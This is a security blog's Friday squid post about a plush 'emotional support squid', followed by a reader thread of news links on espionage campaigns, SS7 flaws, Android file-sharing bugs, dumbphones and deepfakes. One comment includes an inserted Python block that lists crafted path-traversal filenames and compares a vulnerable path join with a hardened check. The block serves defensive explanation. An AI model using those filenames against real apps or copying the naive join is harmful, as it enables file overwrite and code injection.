Friday Squid Blogging: Emotional Support Squid

When asked what makes this an “emotional support squid” and not just another stuffed animal, its creator says:

They’re emotional support squid because they’re large, and cuddly, but also cheerfully bright and derpy. They make great neck pillows (and you can fidget with the arms and tentacles) for travelling, and, on a more personal note, when my mum was sick in the hospital I gave her one and she said it brought her “great comfort” to have her squid tucked up beside her and not be a nuisance while she was sleeping.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Posted on May 17, 2024 at 5:04 PM

Comments

noname May 17, 2024 10:08 PM

Such cute emotional support squid!!

I like all the names, but personally, I would probably rename my squid Squidy

Could one make squid from anything better than: “upcycled fabric”, “love”, “but also A LOT of snark” (in any order of course) 😄

Feeling creepy deepy May 17, 2024 11:25 PM

@ALL

On the top left of the Etsy page there is a golden yellow square with googly eyes and a smaller odd golden thing behind it.

I’m left with a deep down creepy feeling that it is a Bart Simpson hiding behind a SpongeBob SquarePants.

I guess it’s time to catch some nightmares 🙁

lurker May 17, 2024 11:40 PM

@JonKnowsNothing
do not reply, just a second world symbol from a country that likes to think of itself as first world.

A recent Federated Farmers survey highlighted that 52% of respondents still have a landline and 17% still rely on the copper network for their internet connection. [1]

At the privatisation of the telecoms side of the old Post Office, the wires and network hardware remained in the hands of a single entity, now known as Chorus. Maintenance costs are rising on the old parts, mostly in remote rural areas, and Chorus is keen to move users off copper by 2026 where there is an alternative available, and completely by 2033. The two favored alternatives are: wireless within cellphone tower range, or satellite, although who pays how much for satellite is an interesting question.

Mention in the article of Cyclone Gabrielle refers to the widespread failure of cell towers. Nobody mentions that cellphones had been chosen to replace the old Civil Defence HF Radio system, which always worked when needed. Its big problem was it was run by old men who knew what they were doing, with equipment from Dad’s Army, that youngsters wouldn’t dare touch or learn about. Now local Civil Defence organizations are rushing to fill Mr Musk’s pockets with subscriptions to Starlink.

[1] ‘https://www.farmersweekly.co.nz/technology/alarm-bells-in-rural-nz-as-landline-service-rings-off/

echo May 18, 2024 12:43 AM

https://www.youtube.com/watch?v=hhfGspOIg24
Turtle Tanks, “Cope Cages” & Modified Vehicles in Ukraine – Purpose, Evolution & Effectiveness

Or as Perun calls it “Emotional Support Armour” which makes this post strangely on topic. (Yes, I know. Don’t all shout at once.) He does have a turn of words doesn’t he? Oh Lord oh Mighty. I find tech and security and all that po-faced stuff a bit too serious for me. You have to squeeze a laugh in there otherwise you go potty.

https://www.youtube.com/watch?v=QVilpxowsUQ
The Most Misunderstood Philosopher in the World.

Judith Butler invented “gender as a technology” and for those following the discussion the whole topic is caught up in geopolitics and national security, and combating bad actors who include nation states and organisations with deep pockets and their disinformation campaigns, and combating domestic terrorism and threats against democracy.

Philosophy is a long standing casual hobby of mine, and gender studies is a new hobby horse which slots neatly into public policy so gives me something to do. This video is just a mainstream primer for those new to the topic.

https://www.youtube.com/watch?v=p5ANxvEhHqY
Channel Four News
The Political Fourcast
Are Labour and Tories already in election mode?

This video covers subjects which touch on governance and how “think tanks” (glorified lobby and marketing organisations) and dark money can influence public policy in harmful ways. I have a short comment planned which goes into the public policy issues including abuse of public office and the cost of not listening to experts which has knock on effects with child safety and policing.

I may have another comment also on bad governance, and border security, and profiteering which is caught up in this too. I don’t know if the post-Brexit import processing system which crashed this week and border checks will make the cut. It’s just yet one more thing on the pile with a heap of things.

https://www.youtube.com/watch?v=S3lZoxRVglg
Wogan
Fay Presto.

https://www.youtube.com/watch?v=N7JE-4hWhUo
Fay Presto The Legend Of Magic Speaks Out And Does Not Hold Back! | Talk Magic With Craig Petty #41

Magic doesn’t spring to mind very often when discussing security. It appeals to me because of the show element and sleight of hand which are subsets of disguise and other sneakery. People don’t see, they perceive, and it’s not what you’re up to, it’s what they don’t know you’re up to which appeals to me.

It’s been an embarrassing number of years since I was school age. I had so many interests back then. One of them was magic. I did my first magic performance maybe when I was 12-ish. It was a bit of a dud I’m ashamed to remember. When I was older I saw this interview on live broadcast television of the day and was completely amazed by Fay Presto. Something clicked on an emotional and personal level and the magic? Everything just went together.

The reason why I looked up and watched these videos is I’ve been taking up magic again. This time it’s focused on cards and perhaps other close-up sleight of hand. It’s so simple on one level. I’ve been learning a couple of tricks this past week and they’re easy in principle but so very very hard in practice and to do it right every time without fail. It’s not perfectionism I’m chasing. It’s the fun and enjoyment and, wow, does it clear your brain of clutter.

Ooof. If there’s one thing I’ve learned this week it’s never trust a magician’s hands. If they’re moving or not moving their hands are lying. Even a misdirection can be a misdirection.

Good mental health is foundational to everything whether it’s society or the more gimlet eyed security stuff so if you’re feeling stressed or grumpy watch some magic, or maybe learn a magic trick. It’s fun and costs next to nothing.

Feeling creepy deepy May 18, 2024 1:29 AM

Did the Earth Move for you or did Boris pull out?

So no need for the emotional safety blanket.

https://www.yahoo.com/news/russian-rocket-booster-not-military-164627080.html

Some may know what a NOTAM (Notice to airmen) is others not, but simply it’s a warning of what might be a ‘what goes up is coming down’ so don’t fly / go there, lest it ruin your day.

Russia issued a NOTAM for 10 days (16th – 26th) for a largish area off of California also covering the air routes to/from Hawaii. And unsurprisingly stories buzzed onto the Internet that Russia was going to do a ballistic missile launch from a submarine or similar.

Then the story changed to “launch junk re-entry” from a rocket launch booster

Then it changed again as Boris withdrew his NOTAM.

Despite everyone getting all a-Twitter, such NOTAMs are kind of standard.

ResearcherZero May 18, 2024 3:55 AM

RAT used to target highly selective list of AI experts.

‘https://www.darkreading.com/cyberattacks-data-breaches/us-ai-experts-targeted-in-sugargh0st-rat-campaign

AI model exports will be hard to control.
https://www.reuters.com/technology/us-eyes-curbs-chinas-access-ai-software-behind-apps-like-chatgpt-2024-05-08/

‘https://www.trendmicro.com/en_us/research/24/e/earth-hundun-2.html

BlackTech previously modified firmware to backdoor routers within trusted networks.
https://arstechnica.com/security/2023/09/china-state-hackers-are-camping-out-in-cisco-routers-us-and-japan-warn/

‘https://africa.businessinsider.com/local/leaders/china-dethrones-usa-as-the-most-influential-global-power-in-africa-report/ttr57ys

China has used country-to-country infrastructure financing to its advantage.
https://www.voanews.com/a/east-asia-pacific_us-sidelined-chinese-influence-campaign-africa/6209783.html

Huawei has built about 50% of Africa’s 3G networks and 70% of its 4G networks.

‘https://www.voanews.com/a/economy-business_analysts-china-expanding-influence-africa-telecom-network-deals/6209516.html

China took a lead role in Africa’s telecommunication, finance, and surveillance sectors.
https://www.sentinelone.com/labs/cyber-soft-power-chinas-continental-takeover/

“Huawei’s cloud infrastructure and e-government services are handling sensitive data on citizens’ health, taxes, and legal records. These services also operate critical infrastructure, from oil production and fuel distribution in Brazil to power plant operations in Saudi Arabia.”

‘https://reconasia.csis.org/huawei-global-cloud-strategy/

Huawei is helping Malaysia and Russia build 5G networks, and 5G networks in Latin America.
https://www.cfr.org/backgrounder/chinas-huawei-threat-us-national-security

ResearcherZero May 18, 2024 4:09 AM

Improvements needed for the WiFi standard.

SSID Confusion

‘https://www.top10vpn.com/research/wifi-vulnerability-ssid/

echo May 18, 2024 4:11 AM

https://tech.slashdot.org/story/24/05/17/2119221/palantirs-first-ever-ai-warfare-conference
Some of the noteworthy quotes from the panel and convention, as highlighted in Haskins’ reporting, include:

“It’s always great when the CIA helps you out,” Schmidt joked when CIA deputy director David Cohen lent him his microphone when his didn’t work.

The U.S. has to “scare our adversaries to death” in war, said Karp. On university graduates protesting Israel’s war in Gaza, Karp described their views as a “pagan religion infecting our universities” and “an infection inside of our society.”

“The peace activists are war activists,” Karp insisted. “We are the peace activists.”

A huge aspect of war in a democracy, Karp went on to argue, is leaders successfully selling that war domestically. “If we lose the intellectual debate, you will not be able to deploy any armies in the west ever,” Karp said.

A man in nuclear weapons research jokingly referred to himself as “the new Oppenheimer.”

https://www.theguardian.com/technology/article/2024/may/17/ai-weapons-palantir-war-technology

On 7 and 8 May in Washington DC, the city’s biggest convention hall welcomed America’s military-industrial complex, its top technology companies and its most outspoken justifiers of war crimes. Of course, that’s not how they would describe it.

I think if you want lasting geopolitical and national security these are the last people you want to discuss anything with. They’re all off their trolley.

Outside, I talked to an ICRC employee, Thomas Glass. He was attentive and engaged, but he seemed tired. He said that he had just spent several weeks in southern Gaza setting up a field hospital and supporting communal kitchens.

I asked how people at the conference had been responding to his exhibit. Glass said that most people he met had been open-minded, but some asked why the ICRC was at the conference at all. They weren’t aggressive about it, he said. They just genuinely did not understand.

No they don’t and that’s the problem.

Feeling creepy deepy May 18, 2024 6:31 AM

@ALL Android Users

Some people say you should not use messaging and similar “security Apps” because of issues in the OS and drivers allowing the app security to be more easily bypassed.

Well Microsoft have found an issue in Android that provides such an issue to do with the mechanism that enables apps to supposedly share files more securely

“This gives attackers an opening to create a rogue app that can send a file with a malicious filename directly to a receiving app — or file share target — without the user’s knowledge or approval, Microsoft said. Typical file share targets include email clients, messaging apps, networking apps, browsers, and file editors. When a share target receives a malicious filename, it uses the filename to initialize the file and trigger a process that could end with the app getting compromised, Microsoft said.”

https://www.darkreading.com/cloud-security/billions-android-devices-open-dirty-stream-attack

It is a reminder about the supposed rider on the CIA motto of ‘In God We Trust’ that says

“And all others we verify”

You should lose the trust in deities and verify them all the time as well 😉
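The failure mode in the quote above is a share target trusting the filename a sending app’s content provider reports and building a path inside its own private storage from it. As an added example, not taken from the Dark Reading article, Microsoft’s write-up, or the commenter, here is that confinement check written out in Python, with the vulnerable join beside the hardened version; an Android app would apply the same logic in Java or Kotlin to the DISPLAY_NAME returned by ContentResolver.query before constructing the File. The cache directory and the display names are constructed for the example and are not real samples.

```python
import posixpath

# Constructed for this example: a victim app's private cache directory and a
# few display names a rogue content provider could hand back. Not real samples.
VICTIM_CACHE_DIR = "/data/data/com.example.victim/cache"

MALICIOUS_DISPLAY_NAMES = [
    "../shared_prefs/com.example.victim_preferences.xml",  # overwrite settings
    "../../com.example.victim/files/plugin.dex",           # drop loadable code
    "report.pdf\0.sh",                                     # NUL truncation
    "..",                                                  # the directory itself
    "",                                                    # empty name
]


class UnsafeFilenameError(ValueError):
    """Raised when a provider-supplied display name is not a plain file name."""


def naive_cache_path(display_name: str, cache_dir: str) -> str:
    """The vulnerable pattern: trust the reported name and join it to cache_dir.

    This is what 'uses the filename to initialize the file' amounts to; any
    '..' components walk straight out of the cache directory.
    """
    return posixpath.normpath(posixpath.join(cache_dir, display_name))


def is_confined(path: str, base: str) -> bool:
    """True if path is strictly inside base after normalisation."""
    base = posixpath.normpath(base)
    path = posixpath.normpath(path)
    return path != base and posixpath.commonpath([path, base]) == base


def safe_cache_path(display_name: str, cache_dir: str) -> str:
    """Hardened pattern: accept only a plain leaf name, then re-check the result.

    Raises UnsafeFilenameError rather than silently 'fixing' the name, so the
    receiving app can drop the share instead of writing somewhere surprising.
    """
    if not display_name or display_name in (".", ".."):
        raise UnsafeFilenameError(f"not a file name: {display_name!r}")
    # Separators of either kind and NUL are never legitimate in a leaf name.
    if any(ch in display_name for ch in "/\\\0"):
        raise UnsafeFilenameError(f"path characters in name: {display_name!r}")
    base = posixpath.normpath(cache_dir)
    candidate = posixpath.normpath(posixpath.join(base, display_name))
    # Belt and braces: the result must be a direct child of the cache dir.
    if posixpath.dirname(candidate) != base or not is_confined(candidate, base):
        raise UnsafeFilenameError(f"escapes cache dir: {display_name!r}")
    return candidate


def triage(display_names, cache_dir=VICTIM_CACHE_DIR):
    """Run both patterns over each name: (name, naive_escaped, safe_accepted)."""
    results = []
    for name in display_names:
        naive_escaped = not is_confined(naive_cache_path(name, cache_dir), cache_dir)
        try:
            safe_cache_path(name, cache_dir)
            safe_accepted = True
        except UnsafeFilenameError:
            safe_accepted = False
        results.append((name, naive_escaped, safe_accepted))
    return results


if __name__ == "__main__":
    for name, naive_escaped, safe_accepted in triage(MALICIOUS_DISPLAY_NAMES + ["report.pdf"]):
        print(f"{name!r:55} naive escapes={naive_escaped!s:5} hardened accepts={safe_accepted}")
```

Note that the NUL-containing name does not escape the directory under the naive join, which is why the check rejects on characters as well as on the resulting path: a name can be harmless to the path logic and still be mishandled by whatever opens the file later.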

Erdem Memisyazici May 18, 2024 8:55 AM

A lot of people don’t realize that the derpy cute concept is quite alien to a large portion of the planet. Usually the more something looks like a baby, the cuter it is (i.e. chibi), but then you look at the Western cultures and you have these pathetic looking malformed things people find adorable and you wonder what their nightmares might look like.

&ers May 18, 2024 9:17 AM

@ALL

Hungary’s foreign ministry hacking. In English.

hxxps://www.direkt36.hu/en/putyin-hekkerei-is-latjak-a-magyar-kulugy-titkait-az-orban-kormany-evek-ota-nem-birja-elharitani-oket/

Feeling creepy deepy May 18, 2024 10:53 AM

@Erdem Memisyazici

“…you have these pathetic looking malformed things people find adorable and you wonder what their nightmares might look like.”

You are not alone in that thought. As noted above

“I guess it’s time to catch some nightmares :-(“

phranq su0ru May 18, 2024 1:17 PM

“emotional support squid” and not just another stuffed animal

But who will squidly emotionally support the emotional support squids ? And who cries for the just another stuffed animals ?

lurker May 18, 2024 11:14 PM

@Feeling creepy deepy

Since when has Android Messaging been a “security App”?

Any residual trust I might have had in Android file sharing vanished when in Chrome to copy a page url you must “share” it to the clipboard.

ResearcherZero May 19, 2024 3:06 AM

Attackers were able to deploy a variety of newly added malware tools at a massive scale.

‘https://arstechnica.com/security/2024/05/ssh-backdoor-has-infected-400000-linux-servers-over-15-years-and-keeps-on-spreading/

Attackers have repeatedly tracked people in the U.S. via network flaws.

(paywalled)

‘https://www.404media.co/cyber-official-speaks-out-reveals-mobile-network-attacks-in-u-s/

The regulator wants to know the date(s) of the incident(s), what happened.

‘https://www.theregister.com/2024/04/02/fcc_ss7_security/

Attacks are concentrated on a subset of attack sources as well as on a subset of victims.
The main attacks are proportional along the time. Thousands of threats are triggered daily.

‘https://www.fcc.gov/file/13925/download

Filtering alone doesn’t resolve the problems or prevent eavesdropping along the wire.

“Each case has one thing in common: attacks begin with malicious action in one protocol that are continued in another, requiring specific combinations of actions and mixed-generation networks to succeed. Architecture flaws, misconfiguration, and software bugs exist that provide entryways for potential attacks.”

The flaws can also be used to reroute two-factor codes used to prevent fraud.
https://www.zdnet.com/article/5g-networks-could-be-vulnerable-to-exploit-due-to-mishmash-of-old-technologies

Attack Scenarios
https://spectrum.ieee.org/alarming-security-defects-in-ss7-the-global-cellular-networkand-how-to-fix-them

ResearcherZero May 19, 2024 3:14 AM

Wyden also raised some of the scenarios in his 2018 letter.

‘https://www.wyden.senate.gov/imo/media/doc/wyden-fcc-ss7-letter-may-2018.pdf

“A good engineer’s and a good mathematician’s aptitudes don’t always overlap.”

Great programming languages aren’t always great for programming.

‘https://www.wired.com/story/inside-the-cult-of-the-haskell-programmer/

Merging inputs.

‘https://www.wired.com/story/google-io-end-of-google-search/

A key aspect of selective attention, distractor suppression is essential for survival.
https://news.mit.edu/2019/how-brain-ignores-distractions-0612

“Our brains are really complicated, and it’s the coordination that’s hard.”

‘https://www.futurity.org/focus-intelligence-brains-3190652/

jelo 117 May 19, 2024 11:45 AM

@ ResearcherZero

“A good engineer’s and a good mathematician’s aptitudes don’t always overlap.”

Great programming languages aren’t always great for programming

Of course, they should have used Standard ML. 😉

Also, partially au contraire, a good mathematical education including category theory [1] is a help in programming.

  1. https://dl.acm.org/doi/book/10.5555/129094
  2. https://en.wikipedia.org/wiki/Categories_for_the_Working_Mathematician
  3. https://link.springer.com/book/10.1007/978-1-4612-0927-0

&ers May 19, 2024 4:08 PM

@ALL

Enjoyed Hungary’s MFA hacking?
More on that subject!

hxxps://www.welivesecurity.com/en/eset-research/moon-backdoors-lunar-landing-diplomatic-missions/

regular May 19, 2024 4:32 PM

Where is Clive?

Where is SpaceLifeForm?

I see only spamming newcomers.

And sadly this blog is turning from “Security” into “AI” 🙁

Let’s rename it to “Schneier on AI”

Probably need to leave too…

cybershow May 19, 2024 4:37 PM

@all

Not really about security as such (unless you consider sanity of the human race as a kind of security). Anyway I hope you might enjoy this week’s Cybershow episode on AI and Music.

All good wishes

Feeling creepy deepy May 19, 2024 4:56 PM

@ALL

A look in the archives shows one subject that comes up from time to time is the future of “War at Sea” and it appears quite controversial if not divisive amongst long term commenters in the past.

One side kind of suggests that “Carrier fleets” will have a future in Super-Power conflict… Rather than the opposing view of Carrier fleets just being used as well over priced flag wavers to put tax dollars in certain MIC pockets. Oh and maybe still have a role against third world nations that can not fight back being ‘bombed back to the stone ages’.

But the main point of contention appears to be pointing out that carrier groups had their 15mins of fame well back in the last century. Even that they were past it in the Pacific War. And denials about just how vulnerable carrier fleets are to a whole plethora of more modern weapon systems from space on down to the depths of the ocean.

The bottom of down is kind of how far underwater you can put a weapons system. Which currently could be between 1,000 and 5,000 meters.

Many think of manned submarines, which is a subject Perun has just released an interesting video on

https://m.youtube.com/watch?v=S96oRLoE0Zk

However he does not in general go beyond conventional submarines and their eyewateringly expensive costs.

The thing is as with 6th Gen fighter aircraft the future of underwater conflict is going to go to “unmanned” systems. Because for a whole host of reasons “squishy organics” place way too many constraints on what we can currently do. A look at deep sea systems shows this up to the eye. Basically a very large and heavy pressure vessel is needed for the organics, but the mechanics and electrics can work quite well outside of it and are almost trivially small in comparison.

The obvious unmanned subsea platforms would be ‘bottom sitting’ ‘Drone mine’ and ‘Drone torpedo’ systems. They will be sufficiently inexpensive that the upper tier of nations transitioning into Super Powers in their own right could develop and deploy upwards of thousands of such devices and it looks like India and Brazil are currently doing so.

But also there is the question of ‘Subsea drone hypersonic missile platforms’ to think about. It’s a question that few want to consider even though we know the capability to make such systems is now way closer to a question of manufacturing plant construction rather than research.

Anyway the Perun video will make an interesting tech outliner on manned submarines for those with an hour free.

Corporate May 19, 2024 7:02 PM

This site has been a test-bed for AI long before OpenAI’s GPT (or their competitors) was a public thing

The democratization of AI has made “pseudospoofing” more accessible to everyone

Feeling creepy deepy May 19, 2024 7:45 PM

@vas pup

What does the harm to humans in road accidents is the inertial energy of your loose limbs and internal organs.

The inertial energy is proportional to the square of the velocity (speed for normal people 😉).

If you increase the velocity by 10% the energy goes up by 21%. Increase the velocity 20% and the energy goes up by 44% or nearly double.

But the damage done to internal organs is actually nonlinear, due to support structures breaking. So the real harm is quite a bit more.

But you ask

“So, maybe consumer IT things should be designed for real people as well with more embedded safeguards . Agree?”

Humans are actually very bad with complex technology. One reason is the ‘five plus or minus two’ issue of what people can hold in their current conscious cognitive memory.

The way humans deal with this is to get the load down on the conscious cognitive memory. We speak of ‘muscle memory’ for physical actions such as riding a bike or driving a car. Actually the muscles have no memory but at the top of our spine is part of the autonomous subconscious mind. That kind of is our ‘auto pilot’. It responds to recognised signals something like three to seven times faster than the conscious mind. It’s why we can catch a ball or hit a ball that has been pitched/bowled at us and traveled over a short distance at a speed that gives a time too short for our conscious mind to realistically react.

So… it’s not just ‘consumer IT things’ but all ‘IT things’ that should be designed in a way such that what we call ‘muscle memory’ can be built up.

Back in the early 1990’s there was a good deal of investigation into ‘user interfaces’ in what was called ‘Human Computer Interfacing’ (HCI). Many of the lessons that were starting to be learned in HCI research were lost when the push for all graphical interfaces, driven grossly inefficiently by ‘mice’ and other very poorly designed input devices, became vogue.

Contrary to what many people think learning ‘keyboard shortcuts’ significantly improves your ability to use technology and can more than double your efficiency in a matter of a few weeks.

But saying this is heresy and you and I would be lynched by certain entrenched interests if we were to say we should ditch the ‘Graphical User Interface’ (GUI) and go back to the ‘Command Line Interface’ (CLI) of old with a Dvorak keyboard.

Historical note :- The QWERTY keyboard was actually designed to slow ‘typewriters’ down. The mechanics of the devices were slow enough that a skilled typist could ‘beat the strike and drop’ so would have two letters in transit that would tangle.

I used to use a mechanical TTY last century that some will remember as the KSR. There were certain key sequences I had to remember to ‘slow down for’ for the same reason. Mad as it might sound but I could beat the supposed 300baud even though I was not a skilled typist. Because whilst the serial port electrical speed might have been 300baud the typehead mechanics were not much more than the equivalent of a 50baud 7 characters a second system.

noname May 19, 2024 8:22 PM

@vas pup, @Feeling creepy deepy, @All

re: road safety progress

Inspirational. VisionZero is a wonderful paradigm shift with such opportunity to protect life and health.

One of my high school teachers lost her husband in a road accident. He was driving along a long stretch of interstate to pick their daughter up from college.

It’s something that I am unable to forget. I don’t recall the timelines, but wire median has been set up along this stretch. I am so grateful.

I enjoyed reading the examples of safety measures and hope they are thoroughly studied and solidly forefront in the minds of public safety planners.

ResearcherZero May 20, 2024 4:08 AM

Banning political AI-generated deepfakes during the election season.

‘https://fortune.com/2024/05/16/senate-ai-regulation-spending-dominance-china/

Systems that track image provenance can then help reduce the volume.
https://thediplomat.com/2024/05/ai-and-elections-lessons-from-south-korea/

Fake news has the greatest effect against those aged 60 and above.
It is covertly generated and spread as part of negative strategies.

‘https://www.dw.com/en/south-korea-battling-deepfakes-ahead-of-key-election/a-68712855

The speed at which convincing fakes can be produced makes combating it a daunting task.
https://www.brennancenter.org/our-work/research-reports/regulating-ai-deepfakes-and-synthetic-media-political-arena

Hundreds of deepfakes targeting political candidates have already been discovered in 2024.

‘https://www.fenimoreharper.com/s/FENIMORE-HARPER-REPORT_-DEEP-FAKED-POLITICAL-ADS-V2.pdf

ResearcherZero May 20, 2024 4:23 AM

Once emotions are provoked, participation becomes tangible.
This is the first objective — that makes all others possible.

Monitoring diplomatic missions and political reactions allows the actor to adjust strategy.

‘https://www.lemonde.fr/en/pixels/article/2024/05/17/azerbaijan-s-interference-operations-in-new-caledonia-is-only-part-of-the-story_6671708_13.html

Russia and Azerbaijan had both been running operations in New Caledonia in advance.
https://www.smh.com.au/world/oceania/french-officials-see-foreign-interference-behind-deadly-riots-in-new-caledonia-reports-20240517-p5jedl.html

The “Bakou Initiative Group Against French Colonialism” was set up in July 2023, on the margins of a meeting of the non-aligned movement held at the time in the Azerbaijan capital.

‘https://asiapacificreport.nz/2024/04/26/controversial-azerbaijan-deal-sparks-fresh-row-in-new-caledonia/

Turla using steganography to hide commands.

The first backdoor uses HTTP(S) and mimics traffic of services like Windows Update. The second runs as an Outlook add-in on workstations, using PNG, PDF, or email to communicate.

‘https://www.welivesecurity.com/en/eset-research/moon-backdoors-lunar-landing-diplomatic-missions/

echo May 20, 2024 5:04 AM

https://www.tickettailor.com/events/europeanmovement/1262254

The fight for the ECHR: What is at stake?
Wed 29 May 2024 6:30 PM – 7:30 PM BST

Dominic Grieve KC PC
Jessica Simor KC
Andrew Cutting

Brexit is a calamity. It has damaged our economy, broken our politics, and made us weaker on the world stage.

Now, the people responsible for Brexit want to remove the UK from the European Court of Human Rights (ECHR), the international court set up in the aftermath of the Second World War to protect people from tyranny.

* You will have the chance to put your own questions to the panel.
* The event will also be streamed live on YouTube. This means that, if you can’t make it, it will also be available to watch on our YouTube channel the day after the event.
* You will receive the link to join the event once you have RSVP’d.

A constitutional overhaul of the UK is long overdue. Leaving the ECHR is not it. A constitutional convention leading to a written constitution, parliamentary reform, and voting reform makes much more sense. Ditto reform of media and regulators and kicking the dark money funded think tanks out.

https://www.youtube.com/watch?v=T-4CyftrOyk
Jahara ‘FRANKY’ Matisek – Why our Approach to Containing Russia is Wrong & Risks Failure in Ukraine.

https://www.youtube.com/watch?v=6S__TPKQZ74
Casey Michel – Is Putin Retooling His Regime to Support ‘Eternal Warfare’ & Confrontation with West?

I have some comment to make on governance and dark money interests and doctrine relating to geopolitics and human rights and social and military positions, but between them these two videos this week say the key points I wanted to make.

A lot of ink is spilled on the threat from Russian disinformation and military escapades. While they are an issue I feel the main threat is internal. The past 50 years of neoliberalism and more lately right-wing parties being hijacked by the far right is the biggest threat. Russia and other bad actors are simply opportunistically capitalising on this fault line.

US refusal to sign up to the human rights at a constitutional level and join the ICC perpetuates a lot of problems.

Feeling creepy deepy May 20, 2024 5:20 AM

@ResearcherZero
@ALL

When your tools slip and take a chunk out of you

“Turla using steganography to hide commands”

Whilst technically interesting as a covert ‘Command and Control Channel’ (CCC) it’s the rest of it that is the issue. Because in effect it exploits a misconfigured enterprise-level network and application monitoring and control tool.

Whilst some have heard of the closed source ‘SolarWinds’ and what happened with it, considerably less people have heard of the open source near equivalent ‘Zabbix’.

An overview of similarities and differences can be seen

https://www.dnsstuff.com/compare/zabbix-vs-solarwinds-sam

Whilst Solarwinds got actually ‘backdoored’ it appears that in this case Zabbix was incorrectly configured.

The problem with these tools is not that they are effectively agnostic to use, with ‘Good or Bad’ being a matter of the observers perspective.

The reason these types of tool are so attractive to attackers is the fact they are given very wide access at nearly all levels in an enterprise and as proxies have considerable reach and power.

Once such a tool is subverted by an attacker it can do almost anything the legitimate systems administrators can do, from the keyboard and often more.

Winter May 20, 2024 7:23 AM

@cybershow

What now for search?

as you write:

I recently wrote in the Times Higher Education on the demise of coherent and reproducible research methods in universities around the world.

Google creates search for advertising and is under constant attack by con-men and cheats to subvert the ranking of links.

Coherent and reproducible search results are not relevant for Google’s revenue and interfere with their advertising strategies. Also, coherent and reproducible search results are a target for SEO attacks.

To summarize, the only group who values coherent and reproducible search results are search users, and they are the product to be milked.

What now for search? The only large option is currently Bing (and derivatives), which is a victim of the same pressure.

Federated, decentralized, search is a dream, but has horrendous security issues. Just imagine the combined SEO cartels battling it out on decentralized search.

Winter May 20, 2024 7:39 AM

@cybershow. (Continued)

What now for search?

Lists of alternatives

‘https://www.wired.com/story/best-google-search-engine-alternative-privacy/

‘https://www.pcmag.com/picks/go-beyond-google-best-alternative-search-engines

‘https://www.searchenginejournal.com/alternative-search-engines/271409/

‘https://kinsta.com/blog/alternative-search-engines/

‘https://ahrefs.com/blog/alternative-search-engines/

jelo 117 May 20, 2024 12:58 PM

Let a hundred flowers bloom, let a hundred schools of thought contend.

any agent provocateur

vas pup May 20, 2024 7:01 PM

@Feeling creepy deepy @noname

Thank you for input. That is kind of support for my point on IT devices.
People want ‘dumbphones’. Will companies make them?
https://www.bbc.com/future/article/20240515-the-dumbphones-people-want-are-hard-to-find

“Self-labelled neo-Luddites and the tech-stressed are searching for phones with fewer features. Industry experts cite precarious profit margins and a wobbly market around this niche need.

The iPhone turns 17 this year. The launch of the touchscreen-controlled device signaled a moment that has defined our expectations of smartphones ever since.

Almost an entire generation has grown up never knowing life without a smartphone. Enough time has passed that people have learnt about the good and bad of these devices in their lives, whether from myriad scientific studies, or simply their own experiences.

Many people are now acutely aware of the costs of having the world at their fingertips. And they’re rejecting the ways these phones can sap concentration, impact sleep and exacerbate mental health concerns.

They’re transitioning to “dumbphones”, a catch-all term for phones with basic functions such as calling, texting and setting alarms. Some dumbphones resemble 90s flip phones. Others are niche, high-end products that provide a downgraded smartphone experience at a surprising premium.

In some cases, concerned parents are turning to these devices as a way of keeping their children away from the distractions of a smartphone. But the market also comprises seniors who want something simple; workers in tough industries like construction or farming, who need rugged handsets; and everyday users who can’t afford to pay the average price of a smartphone, often upwards of $500, and flagship smartphones can cost as much as $1,600. Abandoning these devices has also become its own trend: teenagers desperate to escape social media have set themselves up as neo-Luddites.

Getting off the smartphone wagon seemed perfect for me.

Yet doing so in practice was a bit harder than I expected. First, I had a hard time getting a dumbphone in my hand at all. There were few options and even fewer recommendations, a stark contrast to the millions of smartphone reviews across the internet. I finally found a website from writer and dumbphone advocate Jose Briones, who offers a “dumbphone finder”. I eventually chose a CAT-S22 flip phone, a semi-smart dumbphone, which has access to apps including Google Maps. It cost $69 and ends any call with a satisfying snap.

Despite demand from a rising trend, I came to understand phone manufacturers have little to no interest in offering these devices. With smartphones comprising the vast majority of all new phone sales, technology giants have little economic incentive to keep churning out new dumbphones or updating their existing line-ups.

According to Statista Market Insights, the total global feature phone market is projected to bring in $10.6bn in revenue this year. Yet while phone manufacturers do pull in notable sums from feature phone sales, they have struggled to turn a profit on the stripped-down hardware. And it’s largely not economically worth it to try to improve the business, especially since phones are often only a small division of their overall companies.

Many of these tech giants generally generate revenue on either software or highly specialized hardware for which consumers will pay hefty price tags. They also have very diverse revenue streams. Samsung, for instance, earns billions each year from its semiconductor division. Simply, these companies have little incentive to cater to dumbphone users, whose revenue potential is relatively minuscule – that is, if they can even make the economics of manufacturing the devices work at all.

Briones, who quit smartphones in 2019, explains that bigger tech companies don’t want dumbphones to overtake their flashier, more expensive models. “The big tech giants don’t want anything that has to do with reducing your smartphone usage because they are not making money on the hardware of the device,” he says.

For instance, dumbphone users across the globe will be out of luck if the 2G and 3G networks that sustain their functionality disappear entirely. Plus, many jobs – even low-wage positions – require employees to carry phones with app capabilities. At the end of the day, there may not be enough customers to buoy even the savviest business model.

To be economically viable, argues Husson, companies could “develop a niche premium brand to reach these segments”. Indeed, some start-ups are trying to capture this specialty market and find economic success – offering a kind of modern take on the feature phone.

the strategy for US-based Ghost Mode. Rather than selling its own phone, the company essentially reprograms a Google Pixel 6a smartphone to a customer’s specifications, with all of the apps they need. Once they do, Ghost Mode locks the phone into those settings. Like most of these niche products, this service isn’t cheap at $600, but it may appeal to top-end consumers more than leaving their smartphones behind entirely.

Samsung Galaxy A32 – with a catch. I installed Minimalist Phone, an app that gets rid of flashy app icons and backgrounds in favor of a stark black-and-white interface. I kept Messenger, WhatsApp and Discord to stay in touch, but nearly every other non-basic app went out the window. I don’t miss them.”

Fewer applications, fewer gates for security and privacy breaches and violations, fewer opportunities to access the phone without a court order for unauthorized surveillance.

Feeling creepy deepy May 20, 2024 8:09 PM

@vas pup
@noname

“People want ‘dumbphones’. Will companies make them?”

An observation and a question that both have the same answer:

Yes, they do, and yes, they do.

The problem is twofold.

Firstly, the network service providers do not like dumbphones because such a phone user is going to have the cheapest plan, and won’t reveal very much about themselves by metadata or location data, so the hidden income for the network service provider is in effect denied.

But the second problem is that dumbphones don’t fit in with GPP “future plans”. As noted such phones are usually 2G and 3G technology and importantly the “radio spectrum” they use is wanted back by Governments to “re-sell” and “re-use” for the likes of 5G and 6G which are completely incompatible.

Though I suspect in many places 2G will carry on for years. The reason is 2G is built into “infrastructure” like transportation, signalling and control. Some systems, like large construction equipment, have a very high price tag and an expected service life measured in a decade or more.

